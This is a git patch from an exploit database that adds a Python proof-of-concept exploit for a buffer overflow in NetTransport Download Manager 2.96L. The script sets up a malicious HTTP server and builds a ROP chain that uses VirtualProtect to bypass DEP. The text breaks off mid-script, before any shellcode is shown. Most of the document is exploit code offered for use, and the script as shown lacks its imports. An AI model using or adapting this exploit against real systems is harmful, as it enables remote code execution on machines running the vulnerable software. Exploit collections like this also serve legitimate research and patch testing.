From b3eb5f7be04948d52dd6222ee9bc600b1dc4561e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 30 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-30 1 changes to exploits/shellcodes NetTransport 2.96L - Buffer Overflow (DEP Bypass) --- exploits/windows/remote/43408.py | 119 +++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 120 insertions(+) create mode 100755 exploits/windows/remote/43408.py diff --git a/exploits/windows/remote/43408.py b/exploits/windows/remote/43408.py new file mode 100755 index 000000000..d3912ae33 --- /dev/null +++ b/exploits/windows/remote/43408.py @@ -0,0 +1,119 @@ +# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass) +# CVE: CVE-2017-17968 +# Date: 28-12-2017 +# Software Link: http://xi-soft.com/downloads/NXSetup_x86.zip +# Exploit Author: Author: Aloyce J. Makalanga +# Contact: https://twitter.com/aloycemjr +# Vendor Homepage: http://xi-soft.com/default.htm +# Category: webapps +# Impact: Code execution + +1. Description + +A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution + +2. Proof of Concept + + +#!/usr/bin/pythion + + + + +def main(): + host = "192.168.205.131" + port = 80 + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((host, port)) + s.listen(1) + print "\n[+] Listening on %d ..." % port + + cl, addr = s.accept() + print "[+] Connection accepted from %s" % addr[0] + + #Disabling DEP by VirtualProtect() + def create_rop_chain(): + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x10001653, # POP EAX # RETN [libssl.dll] + 0x00485ed3,# MOV EAX,DWORD PTR DS:[ECX] # POP EDI # POP ESI # POP EBP # POP ECX # RETN 0x04 [NetTransport.exe] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x00496596, # XCHG EAX,ESI # RETN 0x0A [NetTransport.exe] + 0x41414141, # Filler (RETN offset compensation) + 0x004ea919, # POP EBP # RETN [NetTransport.exe] + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (RETN offset compensation) + 0x4141, # Filler (RETN offset compensation) + 0x004608df, # & push esp # ret [NetTransport.exe] + 0x0045e75f, # POP EBX # RETN [NetTransport.exe] + 0x00000201, # 0x00000201-> ebx + 0x00554dbc, # POP ECX # RETN [NetTransport.exe] + 0x00000040, # 0x00000040-> edx + 0x00499c92, # XOR EDX,EDX # RETN 0x04 [NetTransport.exe] + 0x0041254c, # ADC EDX,ECX # POP EBX # ADD ESP,0C # RETN 0x04 [NetTransport.exe] + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x0054e559, # POP ECX # RETN [NetTransport.exe] + 0x41414141, # Filler (RETN offset compensation) + 0x10004b93, # &Writable location [libssl.dll] + 0x0050343f, # POP EDI # RETN [NetTransport.exe] + 0x00487073, # RETN (ROP NOP) [NetTransport.exe] + 0x10001653, # POP EAX # RETN [libssl.dll] + 0x90909090, # nop + 0x00486f78, # PUSHAD # RETN [NetTransport.exe] + ] + return ''.join(struct.pack('